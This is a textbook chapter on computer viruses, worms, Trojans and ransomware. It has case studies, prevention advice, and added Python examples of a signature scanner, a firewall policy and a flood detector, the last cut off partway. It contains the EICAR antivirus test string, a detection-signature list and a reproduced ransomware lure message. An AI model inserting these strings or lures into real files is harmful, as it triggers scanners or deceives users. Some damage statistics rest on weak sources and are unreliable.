As discussed above, the risks created by viruses are not only risks to computers or networks but also to other electronic devices, such as smartphones, drones, home security cameras, baby monitors, and other devices that use Bluetooth or are connected to the Internet. Smartphones and Bluetooth devices, such as health trackers like Fitbit, have been swarming the market, and many users are constantly connected to the Internet. This technology has also become a popular target of cybercriminals who understand the opportunities to exploit device vulnerabilities. Smart devices have several vulnerabilities, including web browsing, Wi-Fi, multimedia message service (MMS), short message service (SMS), Bluetooth, applications, and e-mails. Malicious code writers have developed viruses that target mobile devices. These viruses are generally referred to as MMS viruses. Similar to computer viruses, these MMS viruses can disrupt phone service, steal information, block data, track the user’s movement, force text messages to friends and others in the address book, etc. Users may never find out that their mobile devices are infected and unwittingly spread the virus to other devices, including computers via USB or Bluetooth connection. Some researchers have warned that devices such as Fitbits could contain a virus, and if the user connects it to a company computer to charge it via USB cable, the virus could spread into the computer network of the company. Although this is currently a hypothetical scenario, it certainly presents a serious danger. Another threat that MMS viruses pose is their ability to randomly scan the phone network and contact mobile phone users who are not in the address book.34 MMS viruses can infect large numbers of smartphones. For instance, the virus “Zombie” infected over one million smartphones in China and created costs of about $300,000 per day. The virus was designed to send automatic text messages.35 See Table 3.3 for examples of types of viruses.
Figure: Picture of a Ransomware Attack by Motormille2, https://commons.wikimedia.org/wiki/File:Ransomware-pic.jpg. Licensed under CC BY-SA 4.0, https://creativecommons.org/licenses/by-sa/4.0/legalcode
Table 3.3 Types of Viruses
| Type | Example | How it works |
| File Infector Virus | Jerusalem, Cascade | Infects program files, such as .com or .exe files. |
| Boot Sector Virus | Disk Killer, Michelangelo | Infects the system area of the disk (the boot record). |
| Master Boot Record Virus | NYB, Unashamed | Also infects the system area of the disk, but stores the viral code in a different location; typically saves a legitimate copy of the master boot record elsewhere. |
| Multipartite Virus | Anthrax, Tequila | Infects both boot records and program files. |
| Macro Virus | Melissa, NiceDay | Infects data files, such as Word documents, through the macros they contain. |
Source: Based on information from Symantec.com. What is the difference between viruses, worms, and Trojan horses? (n.d.). Retrieved from https://support.symantec.com/en_US/article.TECH98539.html.
Case Study 3.3: The First Viruses
Elk Cloner: The First Apple Virus
The first virus reported on an Apple computer was called Elk Cloner. Created in 1982 by 15-year-old Richard Skrenta, Elk Cloner was written for the Apple II and stored on a floppy disk. When the user booted from an infected floppy disk, the virus became resident in the computer's memory and spread by infecting other floppy disks used on that computer. The virus did not cause any actual damage; instead, on every 50th boot it displayed a message on the screen:
Elk Cloner: the program with a personality. It will get on all your disks. It will infiltrate your chips. Yes it’s Cloner! It will stick to you like glue. It will modify ram too. Send to the Cloner!36
Brain: The First PC Virus
In 1986, brothers Basit Farooq Alvi and Amjad Farooq Alvi developed the first computer virus for PCs running MS-DOS. The virus was called "Brain." Brain changes the boot sector of a storage medium, such as a floppy disk, and when the computer boots from that medium, the virus infects the computer. At the time, floppy disks were used to start up a computer. Thus, a virus on a floppy disk was a sure way to infect the computer, and once the virus was on the computer, it stayed in memory and infected newly inserted floppy disks. The Brain virus was mainly a nuisance because it caused work to be lost and displayed perplexing messages to the users of infected computers. Boot sector viruses of this kind faded away once floppy disks were no longer used to start up computers.37
Worms
In his 1975 science fiction novel The Shockwave Rider, John Brunner was the first to use the term worm, calling it a tapeworm. In the novel, Brunner describes a computer-dominated world in which the hero, Nick, creates a tapeworm intended to destroy all government secrecy. Brunner introduces the worm as a "continental net, a self-perpetuating tapeworm." This was the first appearance of the idea of a tool that manipulates information across a computer network, long before the actual Internet developed. The term worm was later adopted by computer experts and defined very similarly to Brunner's usage.38
A worm "is a self-replicating virus that does not alter files but resides in active memory and duplicates itself."39 Worms live and replicate in parts of the operating system that are invisible to the computer user. Users typically notice a worm only when their computer slows down substantially because of the resources consumed by the worm as it replicates.
Whereas viruses need some form of action by the computer user, such as opening an e-mail attachment or link, worms spread without the user's help. Worms also do not need a host program to spread. Worms exploit system vulnerabilities (i.e., weaknesses or flaws in the operating system or in how the system is managed) to intrude into a computer or network. Once inside, the worm replicates and causes damage similar to that of viruses, such as destroying or stealing data, sending e-mails to other computers using the address book, and infecting other computers. Worms replicate via network connections.40 Because they exploit flaws rather than trick users, keeping systems patched is the primary defense against them.
Legal Issue 3.1: The Morris Worm
The creator of the first real computer worm was Cornell graduate student Robert Tappan Morris, the son of Robert H. Morris, then a senior computer security researcher at the National Security Agency (NSA). Around 6 p.m. on November 2, 1988, Morris released the worm onto Unix-based computers connected to the research network (i.e., the early Internet). The Internet had come under attack for the first time. The worm had two main design goals: (1) infect as many computers as possible and (2) be difficult to discover and stop. Within 12 hours, the worm overwhelmed approximately 6,000 computers, reducing their functionality substantially. At the time, this was about 10% of all computers on the network. The Morris worm created much confusion and consternation within the research and military communities, because military computers were also connected to the network. By Wednesday night, researchers at the University of California–Berkeley and the Massachusetts Institute of Technology had captured a copy of the worm and begun analyzing it in an attempt to stop it. Morris, who had not intended to cause that much damage and panic, posted anonymous instructions on the network for stopping the worm's spread. Unfortunately, the network was so overloaded by then that few people actually received the message. By Thursday morning, other researchers had also begun posting information on how to stop the worm. The incident demonstrated for the first time the vulnerability of the network and laid the groundwork for cybersecurity as a field. In its aftermath, the National Computer Security Center held a workshop on the exploitation of the Internet and produced a report detailing how the program worked and how to fix the Unix vulnerabilities it used (the worm spread through a debug feature left enabled in sendmail, a buffer overflow in the finger daemon, and weak, reused passwords).
Morris was charged under the Computer Fraud and Abuse Act of 1986 and became the first person convicted under it; he was sentenced to three years of probation, 400 hours of community service, and a fine. Morris argued that he was only experimenting with worms and had no intention of causing harm.41
What Do You Think?
- Do you believe that Morris had the intent to commit a crime by distributing the worm? If you were his defense attorney, what would you argue? If you were the prosecutor, what would you argue?
- Some people argue that hackers like Morris should be rewarded for demonstrating the vulnerabilities of computer systems. What do you think?
Removing a worm from an infected computer is very difficult because the worm is intertwined with the system. If antivirus or antimalware software does not remove the worm, users may have to do a clean install of the operating system.42
Similar to viruses, worms are a threat not only to computers but also to Bluetooth-enabled devices such as mobile phones, health trackers, wireless surveillance cameras, connected cars, and similar devices. Research suggests that Bluetooth worms spread quickly to nearby devices.43 The first mobile worm, called Cabir, was discovered in 2004 and infected Nokia devices via unsecured Bluetooth connections during the 2005 10th World Championships in Athletics in Helsinki. Cabir accessed the contacts in the user's phone and sent itself to other users.44
Worms create several risks to computers and mobile devices, including (1) risks to the integrity of the computer system, (2) risks to maintaining confidentiality of information on the computer, (3) risks to the availability of computer files, and (4) Internet slowdown.45 Table 3.4 provides a list of the five most destructive worms.
Table 3.4 The Five Most Destructive Worms
| Worm | Year Released | Origin | Damage (source's estimate) |
| Mydoom | 2004 | Russia | $38 billion |
| Sobig | 2003 | United States | Crashed Internet gateways and e-mail servers; $37 billion |
| ILOVEYOU | 2000 | Philippines | Infected 10% of the world's PCs; $15 billion |
| Conficker | 2008 | Ukraine | Infected millions of PCs; $9.1 billion |
| Sasser | 2004 | Germany | Infected critical infrastructure; $18 billion |
Source: Based on information from wildammo.com. (n.d.). 10 most destructive computer worms and viruses ever. Retrieved from http://wildammo.com/2010/10/12/10-most-destructive-computer-worms-and-viruses-ever/.
Risks Created by Worms
- Integrity of the computer system
Some worms cause pop-up messages such as "I think (user's name) is a big, stupid jerk!" This was the WM97/Jerk (strictly speaking a Word macro virus rather than a worm). After the message was displayed, users could continue to work. Other malware may not only show a message but also lock the computer when the message disappears.
- Confidentiality of information on the computer
The user should be the only one who has access to the computer and information stored on the computer. Some worms breach this confidentiality. For instance, the Koobface worm infected computers of users who clicked on a link to update their Adobe Flash. Once inside the operating system, the Koobface worm started to send advertisements for software and recorded the clicks of the user and web searches, which were then sold to the malicious authors of the Koobface worm. This type of worm is also used by criminals who engage in identity theft to steal passwords, credit card numbers, or tax returns.
- Availability of computer files
Worms can interfere with users' access to their files by making files unavailable, damaging files, or slowing down the computer. For instance, the Michelangelo boot sector virus (see Table 3.3), when it activated on March 6, began overwriting the data on the disk.
- Internet slowdown
In January 2003, the Slammer worm (also known as SQL Slammer) caused network interruptions across the United States, Asia, and Russia. The worm also infected the network of news provider ABC and caused hundreds of Bank of America cash machines to be unavailable. Slammer further disabled the websites of major credit card companies and shut down more than 900 systems in the DoD. The entire worm fit in a single 376-byte UDP packet aimed at port 1434, which is why it saturated network links within minutes. Worms such as Slammer can have very serious impacts on network systems and national security.46
Trojan Horses
A Trojan horse is malware that is "disguised as, or embedded within, legitimate software. It is an executable file that will install itself and run automatically once it is downloaded."47 Stated differently, a Trojan horse is a program that poses as a legitimate program but performs unknown or unwanted functions. The term stems from the wooden horse of Greek legend, which carried soldiers inside its body and was used by the Greeks to invade the city of Troy. The Greeks presented the horse to the city as a gift; when the Trojans pulled it inside the city gates, the Greek soldiers hidden within waited until dark and then struck Troy's army in a surprise attack. Similarly, Trojan horses are typically used as delivery systems for crimeware such as keystroke-capturing software, which can then monitor what people type, especially usernames and passwords. Social engineering is the most common way to get a Trojan onto a computer. Social engineering means manipulating a person into taking an action, such as running a file or giving out personal information, that they would not take if they understood its consequences. Once the user has activated the Trojan, the malware can delete, block, modify, or copy data from the computer. A Trojan horse may also disrupt the performance of the computer or network. Unlike viruses and worms, Trojans are not capable of self-replication.48
The first Trojan for Android mobile devices was discovered by Kaspersky Lab in 2010. It was named Trojan-SMS.AndroidOS.FakePlayer.a because it masqueraded as a media player application while silently sending SMS messages to premium-rate numbers. Since 2010, there has been a rapid increase in mobile Trojans, especially those targeting the open Android platform.49
Trojan horses create five main risks for computers and mobile devices: (1) deleting files, (2) using the computer to infect other computers, (3) watching users through the webcam, (4) logging keystrokes, and (5) recording user names, passwords, and other personal information.50 See Table 3.5 for a list of the types of Trojan horses.
Table 3.5 Types of Trojan Horses
| Trojan Horse | Damage | Type |
| NVP | Modified a system file on Macintosh computers so that all typed vowels disappeared. | Joke Trojan |
| Feliz | Displayed an image warning users not to run any programs. | Joke Trojan |
| AOL4Free | Claimed to give users free access to AOL and then wiped every file from the infected hard drive. | Joke Trojan |
| ProMail | Claimed to be a freeware e-mail program and then stole user data. | Data Theft Trojan |
| SubSeven | Deletes, modifies, and copies files; steals information. | Remote Access Trojan |
| Back Orifice | Gives the attacker access to the victim's files. | Remote Access Trojan |
Source: Based on information from etutorials.com. Types of Trojan Horses. (n.d.). Retrieved from http://etutorials.org/Misc/computer+book/Part+2+Dangerous+Threats+on+the+Internet/Chapter+8+Trojan+Horses-+Beware+of+Geeks+Bearing+Gifts/TYPES+OF+TROJAN+HORSES/.
Risks Created by Trojan Horses
- Deleting files
One of the main problems with Trojan horses is that files are deleted or corrupted in another way. This, of course, is not only inconvenient but can cause great problems if it affects work files that can’t be recovered.
- Using your computer to infect other computers
A Trojan horse planted on a computer may access the user's address book and send phishing e-mails to other people with the Trojan horse attached. Users who open the attachment unknowingly install the Trojan on their own computer. Once there, it reads that address book and the process starts over, so the Trojan spreads to more and more computers. For instance, the Trojan horse "Sub7" or "SubSeven" was developed to attack computers running Windows 9x. What makes Sub7 so dangerous is that its author, or anyone else holding the controlling client, can remotely control the infected system and issue any command to it. A variety of commands can be given, such as "send an e-mail to the attacker after installation" or "melt server after installation" (delete the installer to hide its traces). This flexibility makes Sub7 a very versatile Trojan. Some of the less dangerous but very irritating things the attacker can do include reversing the mouse buttons, restarting Windows repeatedly, or changing desktop colors. Sub7 can also cause very serious damage to an infected system, however, including stealing data, taking control of messaging, and overwriting or destroying files.51
- Watching users through their webcam
Trojan horses can also be used to spy on people. An attacker who infects a user's computer with a Trojan horse may watch the user through the webcam and observe their security system, children, daily routines, or other things. Similar capabilities are sold commercially; for instance, online courses may use proctoring software such as "Proctor" to watch students through the webcam while they take exams.
- Logging users’ keystrokes
A keylogger Trojan records users’ keystrokes, saves them to a file, and sends them to the author of the malicious software. The goal is to get information such as passwords, credit card numbers, or documents. Some keylogger software is more advanced and able to monitor for specific activity, such as opening a web browser pointing to a specific website (e.g., banking or credit card site). Keylogger programs are also available as commercial software for parents or employers to monitor children’s or employees’ online activity.52
- Recording usernames, passwords, and other personal information
In 2011, a Trojan horse traced to China hijacked computers of the Japanese parliament with the intent of stealing data. It is possible that the hackers were able to download passwords and other information stored on the government computers. These types of attacks are of special concern for industrial companies and their intellectual property, since stealing such information can drive a company into bankruptcy. For instance, if a hacker could steal the blueprint for a certain machine and then build the machine more cheaply, the company that invented the machine could lose all its business.53
Case Study 3.4: The U.S. Government Firewall Virus
The U.S. government firewall virus belongs to the Reveton family (Trojan/Win32.Reveton), which hijacks computers and demands a ransom to unblock them.54 This is also referred to as ransomware. Ransomware is "a type of malware that severely restricts access to the computer, device, or file, until a ransom is paid by the user."55 The U.S. government firewall virus locks the computer screen (Reveton is a screen locker; unlike CryptoLocker, discussed below, it does not encrypt the user's files) and displays the following message, which purports to come from the U.S. government.
The Firewall of the United States Computer Blocked
This computer has been blocked to Americans by the US Government Firewall
Illegally downloaded material
(audio, videos or software)
has been located on your computer
By downloading, those were reproduced, thereby involving a criminal offence under Section 106 of Copyright Act.
The downloading of the copyrighted material via the Internet or music sharing networks is illegal and is in the accordance with Section 106 of the Copyright Act subject to a fine or imprisonment for a penalty of up to 3 years.
Furthermore, possession of illegally downloaded material is punishable under Section 184 paragraph 3 of the Criminal Code and may also lead to the confiscation of the computer, with which the files were downloaded.
To perform the payment, enter the acquired GreenDot MoneyPack code in the designated payment field and press the “OK” button.
The U.S. government, of course, has not blocked the user's computer; rather, the computer is infected with a Trojan horse and cybercriminals are trying to extort money. Screen-locking malware of this kind can usually be removed with a tool such as Hitman Pro.56 This is not true of all ransomware, however. For file-encrypting ransomware, removing the malware does not bring the files back, and without the attacker's key (or a backup) even the FBI cannot decrypt them.
Modern ransomware attacks were first reported in Russia in 2005. New scams keep appearing, and ransom attacks have become common around the globe. One of the most "successful" ransomware attacks was conducted with CryptoLocker, which infected hundreds of thousands of PCs; it arrived mainly as an e-mail attachment and encrypted files not only on the local disk but also on any network shares the infected machine could reach.
Most ransomware attacks on private users ask for $100 to $300 because that seems to be a sum users are willing to pay to get their data back. Attacks on companies or hospitals tend to demand far more because the stakes for the victim are much higher: a company that cannot access its computers for several days may lose a great deal of money. Cybercriminals are well aware of this predicament and use it to extort large sums. Victims carry the risk that even if they pay the ransom, there is no guarantee the computer will be fully functional again. If the criminals demand payment by credit card, they may also steal that card information, inflicting additional financial losses.57 A proven firewall and antivirus software help avoid such intrusions, and regular backups kept offline or otherwise unreachable from the infected machine are the most reliable way to recover without paying. In addition, users should use the other prevention methods discussed in the next section.
What Do You Think?
- If you were the victim of a ransomware attack, what negative consequences would that cause for you?
- What safeguards do you currently use to protect yourself against ransomware attacks? How can you improve your safeguards?
Preventing Malware Intrusions
There are several effective countermeasures users can employ to prevent infection of their computer with a malware.
Antivirus Software
Antivirus software is "a class of program that will prevent, detect and remediate malware infections on individual computing devices and IT systems."58 Antivirus programs recognize malware and prevent it from entering the computer by checking programs and comparing them to known malware. Viruses, worms, and Trojan horses are nothing more than malicious code, and antivirus software detects that code. This is referred to as signature matching. Every known virus has a specific signature (a hash of the file or a characteristic byte pattern), and antivirus programs ship with a database of these signatures. The more comprehensive the database, the more likely a virus is to be detected. Unfortunately, no antivirus software can detect all viruses, because the code must already be known: new, unknown malicious code cannot be matched against a signature. To get the best possible protection, the user must keep the signature database current and apply updates to the scanner itself, because malware writers modify their programs and develop new threats.59
Antivirus software is an inexpensive way to provide up-to-date protection for computers. There is a wide variety of antivirus software on the market; some of the most popular products are Avira, Bitdefender, McAfee, Norton Antivirus, and Sophos. Every antivirus program has its pros and cons. Good antivirus programs recognize malware effectively with real-time and on-demand scanners, are easy to install and use, and can scan files such as e-mail attachments, including inside compressed archives. Good antivirus software also performs heuristic checks for suspicious behavior or structure (for example, a program whose body is packed or encrypted) to catch new, unknown malware. Some antivirus software can repair a virus infection, but typically only if the host file is not damaged.60 In addition to antivirus software, computers should also be protected by a firewall.
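The signature matching and heuristic checking described above, as an added illustration that is not code from the chapter or from any antivirus vendor. The EICAR string is the industry's real, harmless test sample; the second pattern signature, the sample "dropper" text, and the packed payload are constructed for this example:

```python
"""Signature matching and why it misses unknown code.

Added illustration; it is not from the chapter and not a real antivirus
engine. The EICAR string is the industry's harmless standard test sample;
the second pattern signature, the "dropper" text and the packed payload are
constructed for this example.
"""
import hashlib
import math
from typing import Dict, List

# Standard antivirus test file (harmless by design).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# A signature database holds (at least) two kinds of entry: whole-file
# hashes, which are cheap but break on any change, and byte patterns,
# which survive changes elsewhere in the file.
HASH_SIGNATURES: Dict[str, str] = {
    hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File",
}
PATTERN_SIGNATURES: Dict[bytes, str] = {
    b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE": "EICAR-Test-File",
    b"CONSTRUCTED-DROPPER-MARKER-v1": "Example.Dropper.v1",   # constructed
}


def scan(data: bytes) -> List[str]:
    """Return the names of every signature that matches, sorted, no duplicates."""
    hits = set()
    name = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if name:
        hits.add(name)
    for pattern, name in PATTERN_SIGNATURES.items():
        if pattern in data:
            hits.add(name)
    return sorted(hits)


def shannon_entropy(data: bytes) -> float:
    """Bits of information per byte; 8.0 is the maximum (uniform bytes)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(data: bytes, threshold: float = 7.2) -> bool:
    """Heuristic check: packed or encrypted program bodies sit near 8 bits/byte,
    while ordinary code and text sit well below. Needs enough bytes to be
    meaningful, so very short inputs are never flagged."""
    return len(data) >= 256 and shannon_entropy(data) > threshold


# Stand-in for an encrypted malware body: 2048 pseudo-random bytes built
# deterministically from SHA-256 so the example runs the same everywhere.
ENCRYPTED_PAYLOAD = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))


if __name__ == "__main__":
    print("exact sample:     ", scan(EICAR))                      # hash and pattern both hit
    print("one byte appended:", scan(EICAR + b"\r\n"))            # hash misses, pattern still hits
    print("pattern altered:  ", scan(EICAR.replace(b"-STANDARD-", b"_STANDARD_")))  # nothing matches
    print("dropper text:     ", scan(b"hello CONSTRUCTED-DROPPER-MARKER-v1 world"))
    print("entropy of text:  ", round(shannon_entropy(EICAR * 20), 2), looks_packed(EICAR * 20))
    print("entropy of packed:", round(shannon_entropy(ENCRYPTED_PAYLOAD), 2), looks_packed(ENCRYPTED_PAYLOAD))
```

Appending a single byte defeats the hash signature but not the pattern signature; altering the pattern itself defeats both, which is the chapter's point that unknown code cannot be matched until the database is updated. The entropy heuristic flags the packed body without knowing what it contains, at the cost of false positives on legitimately compressed or encrypted files.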
Firewall
A firewall is "a software program or piece of hardware that helps screen out hackers, viruses, and worms that try to reach your computer over the Internet."61 Firewalls are an important part of cybersecurity. Companies that use a firewall to protect their network must decide which inbound and outbound Internet traffic they will allow. The firewall must be configured so that it passes only approved traffic and drops everything else by default. Any change to the rule set should be approved, and the security logs should be reviewed regularly. A firewall is also important for private users, who should be cautious before allowing a connection or website that the firewall has blocked.62 Unfortunately, firewalls are not a fail-safe solution. Malware can bypass a perimeter firewall by riding an already-authorized path, such as a virtual private network (VPN) connection, into another target such as a power grid operator. For instance, the North American Equipment Council reported that a computer worm had penetrated a data storage system by migrating through the company's corporate network.63
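The "only approved traffic passes, everything else is dropped and logged" rule described above, modeled as an added example. This is not code from the chapter and not a real firewall; the networks, ports, and sample traffic are constructed (documentation address ranges):

```python
"""First-match firewall policy with default deny and a denial log for review.

Added illustration; it is not from the chapter and not a real firewall. It
models the rule the text states: only explicitly approved traffic passes, in
either direction, and everything refused is logged so the log can be
reviewed. The networks, ports, and sample traffic are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    action: str              # "allow" or "deny"
    direction: str           # "in" (toward this host) or "out" (from this host)
    proto: str               # "tcp", "udp", or "any"
    peer: str                # remote network in CIDR notation
    port: Optional[int]      # destination port of the connection; None = any
    comment: str             # the justification reviewers will look for


@dataclass(frozen=True)
class Packet:
    direction: str
    proto: str
    peer: str                # remote address
    port: int                # destination port of the connection


# Order matters: the first matching rule wins. The two trailing deny rules
# turn "not explicitly allowed" into "dropped and logged".
POLICY: List[Rule] = [
    Rule("allow", "in",  "tcp", "10.0.0.0/8",  22,   "SSH only from the internal management network"),
    Rule("allow", "in",  "tcp", "0.0.0.0/0",   443,  "public HTTPS service"),
    Rule("allow", "out", "udp", "10.0.0.0/8",  53,   "DNS to internal resolvers"),
    Rule("allow", "out", "tcp", "0.0.0.0/0",   443,  "outbound HTTPS for updates"),
    Rule("deny",  "in",  "any", "0.0.0.0/0",   None, "default deny inbound"),
    Rule("deny",  "out", "any", "0.0.0.0/0",   None, "default deny outbound"),
]


def matches(rule: Rule, pkt: Packet) -> bool:
    return (rule.direction == pkt.direction
            and rule.proto in ("any", pkt.proto)
            and ip_address(pkt.peer) in ip_network(rule.peer)
            and rule.port in (None, pkt.port))


def evaluate(policy: List[Rule], pkt: Packet) -> Tuple[str, str]:
    """Return (action, reason) from the first rule that matches."""
    for rule in policy:
        if matches(rule, pkt):
            return rule.action, rule.comment
    # Even if someone deletes the explicit deny rules, nothing unmatched passes.
    return "deny", "implicit default deny"


def filter_traffic(policy: List[Rule], packets: List[Packet]) -> Tuple[List[Packet], List[str]]:
    """Apply the policy; return the packets that passed and the denial log."""
    passed, log = [], []
    for pkt in packets:
        action, why = evaluate(policy, pkt)
        if action == "allow":
            passed.append(pkt)
        else:
            log.append(f"DENY {pkt.direction} {pkt.proto} peer={pkt.peer} port={pkt.port} ({why})")
    return passed, log


# Constructed sample traffic.
SAMPLE_TRAFFIC: List[Packet] = [
    Packet("in",  "tcp", "10.20.1.7",    22),    # admin SSH from inside: allowed
    Packet("in",  "tcp", "203.0.113.9",  22),    # SSH from the Internet: denied
    Packet("in",  "tcp", "203.0.113.9",  443),   # ordinary web visitor: allowed
    Packet("in",  "udp", "198.51.100.4", 1434),  # Slammer-style probe: denied
    Packet("out", "udp", "10.0.0.53",    53),    # DNS lookup: allowed
    Packet("out", "tcp", "198.51.100.4", 4444),  # worm or RAT calling home: denied
]


if __name__ == "__main__":
    passed, log = filter_traffic(POLICY, SAMPLE_TRAFFIC)
    print(f"{len(passed)} passed, {len(log)} denied")
    print("\n".join(log))
```

The outbound deny rule is the part home users most often skip: it is what stops an already-infected machine from calling home on an arbitrary port, and the resulting log lines are the first evidence an analyst will look for.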
Thoughtful User Behavior
Some cybersecurity experts argue that technology has outpaced people: people use sophisticated technologies without any education about how a criminal views that technology and its potential for abuse. In the absence of such education, people naturally make bad decisions, because it is easy to use technology insecurely and difficult to use it securely.64 The following are rules users should follow to avoid infecting their computer or mobile devices with malware.
- Users should refrain from opening e-mail attachments that are unexpected or unsolicited, as such attachments are a common way to spread malware. Many of these attachments appear to come from friends, official agencies, or companies such as Microsoft or Adobe. Microsoft, for instance, never sends security updates as e-mail attachments; such attachments are hoaxes. Similarly, users should not click links in unexpected e-mails; if the message claims to be from a bank or service, type the organization's address into the browser instead.
- Unsolicited CDs and DVDs can also contain malware. Users can check a CD or DVD with their antivirus software to make sure it does not contain malware. This strategy does not guarantee a clean CD or DVD, however. Criminals who write malware try their best to stay ahead of antivirus developers.
- Websites that offer free services such as live TV streams can be a trap, and great caution is warranted. Websites such as hahasport.com may ask users to update Adobe Flash or some other media player before they can stream TV for free. The link provided for the "update" actually delivers malware, and once the user clicks it, the malware infects the computer or mobile device.
- Threats also stem from applications such as Pokémon Go. Users may download a fake application that contains a malware instead of the actual program. It is also possible that users give inadvertent permission to access their phone or Google account.
- Weak or reused passwords are also a liability because malware can steal passwords. If a person uses the same password for several accounts or applications and it is stolen, the criminal gains access to all of those accounts.65 A password manager makes a unique password for each account practical.
- Users should install operating system and application updates promptly. Worms spread by exploiting known vulnerabilities, and a patched system closes the holes they rely on.
Each of these rules makes using technology more difficult and cumbersome. Thus, many people choose to ignore them and continue to use technology insecurely. Cybersecurity would advance greatly if it were easy to use technology securely and difficult to use it insecurely. Achieving that is very complicated, however, and we are not close to such a breakthrough.
Think About It 3.2: Pokémon Go, Cybercriminals, and Cybersecurity
The Pokémon Go craze, developed by Niantic Labs, started in July 2016 in the United States, Australia, and New Zealand and then spread quickly across the globe. The frenzy over the Japanese gaming app inspired not only users to catch Pokémon but also cybercriminals to attack those users. The game had substantial vulnerabilities. One threat was downloading the app from an unverified source and falling victim to a malicious copy that could delete or steal information, install spyware on the device, or take remote control of it; cybercriminals repackaged the genuine app with added malicious code. Another issue concerned the sign-in used by the app: because of a software bug, Apple iPhone users who signed in with Google granted the app full permission to their Google account, and they were not informed of this when agreeing to the terms and conditions. Users who gave that permission were advised to uninstall the app and revoke its access to their Google account.66
What Would You Do?
- What safeguards do you use before you download an app? As a reference article, read “Pokémon Go: When Cyber Security Breaches Real Life” at https://www.bluecatnetworks.com/blog/2016/07/25/pokemon-go-cyber-security-breaches-real-life/
- Pokémon Go uses location data to guide users to the Pokémons. How could criminals abuse these location services?
Encryption
Encryption is obfuscation that is fast to undo when you know the secret but impractically slow when you do not. Encryption of data is still the most effective way to protect it from being read if it is stolen. Encryption is one of the core tools of cryptography, the broader science of securing information. Even though the NSA has the capability to crack some encrypted data, doing so is very difficult and resource intensive, and some suggest that even the NSA cannot decrypt data encrypted with the Advanced Encryption Standard (AES) under a strong key.67 The chapter's model of proper encryption encompasses five components: (1) attribution, (2) integrity of data, (3) nonrepudiation, (4) infinity, and (5) scrambled text. Attribution refers to a digital signature providing proof of authorship. The signature may be used to provide legal proof of a person's communications and activities. It is imperative that only the person with authority to sign can actually do so; if someone could pose as the signatory, the system is not secure. Imagine that the DoD receives a request for data about its latest stealth fighter from the president of the United States, when in fact the request comes from a Chinese hacker working for the Chinese government with the intent to steal the data and reverse engineer the fighter jet. This type of cyberespionage is very common and can become a threat to national security.
Integrity of data “refers to protecting information from being modified by unauthorized parties.”68 Only information that is correct also has value. In addition, if data is manipulated, this can prove very costly. Imagine that the CIA sends information to the president of the United States about a possible nuclear attack against the United States by North Korea. In reality, the information was manipulated and there is no nuclear threat. The president could potentially authorize a preemptive strike against North Korea, which could lead to a war.
What the chapter lists as nonrepudiation is, in standard security terminology, availability: persons authorized to access information must always be able to reach it. (Nonrepudiation in the strict sense means that the signer of a message cannot later deny having signed it; that property comes from the digital signature described under attribution.) One of the main cyberattacks today is denying information to authorized persons. There are two main ways to deny access: denial-of-service (DoS) attacks and distributed denial-of-service (DDoS) attacks. In a DoS attack, the attacker floods the network or server and overloads it, making it impossible for the authorized user to access the network and information. In a DDoS attack, the attacker typically takes over innocent people's computers ahead of time, by exploiting security vulnerabilities in them, and then uses those machines (a botnet) to overwhelm the target with requests from many sources at once.69 One of the largest DDoS attacks of its kind, if not the largest, was carried out by the Mirai botnet, which in October 2016 disrupted much of the Internet in the United States and Europe, including Twitter, Netflix, Reddit, and CNN, by attacking the DNS provider Dyn. Mirai was distinct from earlier attacks because it exploited the vulnerabilities of the Internet of Things (IoT): it took over IP cameras, digital video recorders, and home routers by logging in with their factory-default passwords. The IoT includes such devices along with health trackers, smartwatches, and other consumer goods connected to the Internet. The sheer number of IoT devices that have flooded the market has greatly increased hackers' access to personal information and their ability to hijack devices for DoS attacks. These goods often have much weaker security than computers and are therefore easy for a hacker to access, making the attacks much larger.
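The DoS versus DDoS distinction drawn above, shown as detection logic over sample traffic. This is an added example, not code from the chapter; the log format and every line of traffic are constructed for it:

```python
"""Rate-based flood detection over constructed connection-log lines.

Added illustration, not from the chapter. The log format is invented for
the example: "<unix_time> <src_ip> <dst_ip>:<dst_port> <tcp_flag>". It shows
the distinction the text draws: a DoS from one machine trips a per-source
limit, whereas a DDoS spreads the same load over many hijacked machines,
each staying under that limit, so only an aggregate limit on the target
reveals it.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Set, Tuple

LINE_RE = re.compile(r"^(\d+) ([\d.]+) ([\d.]+):(\d+) (SYN|ACK|FIN)$")


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line; malformed lines yield None and are skipped, not guessed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, flag = m.groups()
    return {"ts": int(ts), "src": src, "dst": dst, "port": int(port), "flag": flag}


def detect_floods(lines: List[str], per_source_limit: int = 50,
                  aggregate_limit: int = 200) -> Tuple[Set[str], List[Tuple[int, int, int]]]:
    """Count connection attempts (SYN) per one-second window.

    Returns (dos_sources, flood_windows): sources that alone exceeded the
    per-source limit, and windows (ts, total_syns, distinct_sources) whose
    aggregate exceeded the target's limit."""
    syns_per_window: Dict[int, Counter] = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["flag"] == "SYN":
            syns_per_window[rec["ts"]][rec["src"]] += 1

    dos_sources: Set[str] = set()
    flood_windows: List[Tuple[int, int, int]] = []
    for ts, counts in sorted(syns_per_window.items()):
        dos_sources.update(src for src, n in counts.items() if n > per_source_limit)
        total = sum(counts.values())
        if total > aggregate_limit:
            flood_windows.append((ts, total, len(counts)))
    return dos_sources, flood_windows


def constructed_log() -> List[str]:
    """Three seconds of made-up traffic against one server: normal, DoS, DDoS."""
    target = "192.0.2.10"
    lines: List[str] = []
    for i in range(5):                       # t=100: five clients, three SYNs each
        lines += [f"100 198.51.100.{i + 1} {target}:443 SYN"] * 3
    lines += [f"200 203.0.113.9 {target}:443 SYN"] * 120   # t=200: one source floods
    for i in range(300):                     # t=300: 300 bots, one SYN each
        lines.append(f"300 10.{i // 256}.{i % 256}.77 {target}:443 SYN")
    lines.append("this line is corrupt and must not crash the detector")
    return lines


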